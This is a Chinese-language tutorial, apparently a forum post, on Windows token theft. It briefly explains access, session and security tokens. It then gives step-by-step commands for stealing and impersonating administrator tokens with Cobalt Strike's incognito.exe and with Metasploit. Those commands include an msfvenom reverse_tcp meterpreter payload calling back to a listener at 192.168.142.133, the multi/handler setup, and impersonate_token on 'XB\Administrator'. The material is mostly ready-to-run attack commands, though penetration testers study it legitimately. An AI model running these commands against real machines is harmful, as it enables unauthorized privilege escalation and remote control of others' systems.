Windows令牌窃取攻击
目录
一、Windows令牌
- 令牌(Token)是系统的临时密钥,相当于账户名和密码,用来决定是否允许这次请求和判断这次请求是属于哪一个用户的,它允许你在不提供密码或其他凭证的前提下,访问网络和系统资源,这些令牌持续存在系统中,除非系统重新启动。
- Windows令牌种类:
- (1)访问令牌(Access Token)表示访问控制操作主题的系统对象
- (2)会话令牌(Session Token)是交互会话中唯一的身份标识符
- (3)保密令牌(Security Token)又叫认证令牌或硬件令牌,是一种计算机身份校验的物理设备
- Windows访问令牌又分为:
- (1)授权令牌(Delegation Token),也叫主令牌,支持交互式会话登录(例如本地用户登录、远程桌面登录)
- (2)模拟令牌(Impresonation Token)支持非交互的会话(例如使用 net use访问共享文件夹)
复制代码 二、令牌窃取攻击
前提:拿到的用户是过了UAC的管理员
1、通过CS进行令牌攻击
(1)通过CS控制了一个过了UAC的管理员
(2)列出用户的令牌- shell incognito.exe list_tokens -u
复制代码 (3)使用窃取的令牌进行上线- shell incognito.exe execute -c "XB\Administrator" C:\Users\test\Desktop\win10-3\can.exe
复制代码 2、通过msf进行令牌攻击
(1)通过msfvenom生成木马- msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.142.133 lport=4567 -f exe -o payload.exe
复制代码 (2)进入msfconsole进行监听- use exploit/multi/handler
- set payload windows/meterpreter/reverse_tcp
- set lhost 192.168.142.133
- set lport 4567
- run
复制代码 (3)加载incognito,进行令牌攻击- load incognito #加载incognito
- list_tokens -u #列举令牌
- impersonate_token "XB\Administrator" #令牌攻击
- rev2self 或 drop_token #返回之前token
复制代码 免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作! |